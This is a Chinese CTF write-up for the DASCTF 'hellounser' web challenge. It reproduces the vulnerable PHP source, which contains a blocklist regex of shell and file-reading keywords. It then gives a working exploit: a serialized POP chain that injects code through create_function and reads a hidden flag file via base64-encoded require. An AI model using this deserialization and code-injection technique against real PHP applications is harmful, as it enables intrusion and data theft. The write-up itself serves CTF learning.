DASCTF Sept X 浙江工业大学秋季挑战赛 web
作者:互联网
hellounser
直接可读源码
<?php
class A {
public $var;
public function show(){
echo $this->var;
}
public function __invoke(){
$this->show();
}
}
class B{
public $func;
public $arg;
public function show(){
$func = $this->func;
if(preg_match('/^[a-z0-9]*$/isD', $this->func) || preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log/i', $this->arg)) {
die('No!No!No!');
} else {
include "flag.php";
//There is no code to print flag in flag.php
$func('', $this->arg);
}
}
public function __toString(){
$this->show();
return "<br>"."Nice Job!!"."<br>";
}
}
if(isset($_GET['pop'])){
$aaa = unserialize($_GET['pop']);
$aaa();
}
else{
highlight_file(__FILE__);
}
?>
审计代码发现需要GET方式传入”pop”,然后经反序列化后被调用。
A类中的_invoke()
魔术方法能在A类被调用为函数时触发,从而调用show()
函数,输出$var
,而B类中的_toString()
魔术方法能在B类被当作字符串使用时触发,若让$var=B
类,则_toString()
被触发时调用B的show()
函数。
查看B类中show()
函数,func
、arg
被绕过后则可包含”flag.php”文件,注释中提到不会输出,便只能依赖$func
函数——有两个参数,且能执行任意命令,可利用cretae_function
,既绕过了func
的匹配,又可以执行(这里需要用}
闭合函数)。
由此构造如下代码
$a=new A();
$b=new B();
$b->func="create_function";
$b->arg="}var_dump(get_defined_vars());//";
$a->var=$b;
echo urlencode(serialize($a));
传入” cretae_function”
作为$函数名,然后将"}var_dump(get_defined_vars());//"
传入arg
,从而绕过了匹配并执行$func('', $this->arg);
,相当于执行如下代码
create_function("",}var_dump(get_defined_vars());//)
也即--------->
cfunction(""){
}var_dump(get_defined_vars());//}
这里的var_dump()
函数可以输出变量的相关信息,显示关于一个或多个表达式的结构信息,包括表达式的类型与值(其中数组会递归展开值,通过缩进显示其结构);而get_defined_vars()
函数能返回由所有已定义变量所组成的数组,通过这两个函数能看到所有已定义变量。
经以上代码执行便可得到序列化$a
的url编码,传入后得到
发现真正的flag藏在一个叫Tru3flag.php的文件里,因此base64绕过后,用require()
函数包含执行[或者cat查看用取反绕过的办法]
require(base64_decode(VHJ1M2ZsYWcucGhw));
修改后的完整代码如下
class A {
public $var;
public function show(){
echo $this->var;
}
public function __invoke(){
$this->show();
}
}
class B{
public $func;
public $arg;
public function show(){
$func = $this->func;
if(preg_match('/^[a-z0-9]*$/isD', $this->func) || preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log/i', $this->arg)) {
die('No!No!No!');
} else {
include "flag.php";
//There is no code to print flag in flag.php
$func('', $this->arg);
}
}
public function __toString(){
$this->show();
return "<br>"."Nice Job!!"."<br>";
}
}
$a=new A();
$b=new B();
$b->func="create_function";
$b->arg="}require(base64_decode(VHJ1M2ZsYWcucGhw));var_dump(get_defined_vars());//";
$a->var=$b;
/*
create_function("",}var_dump(get_defined_vars());//)
--------->
cfunction(""){
}var_dump(get_defined_vars());//}
*/
echo urlencode(serialize($a));
?>
得到flag
标签:function,web,show,func,arg,var,DASCTF,Sept,public 来源: https://www.cnblogs.com/ialoe/p/16593231.html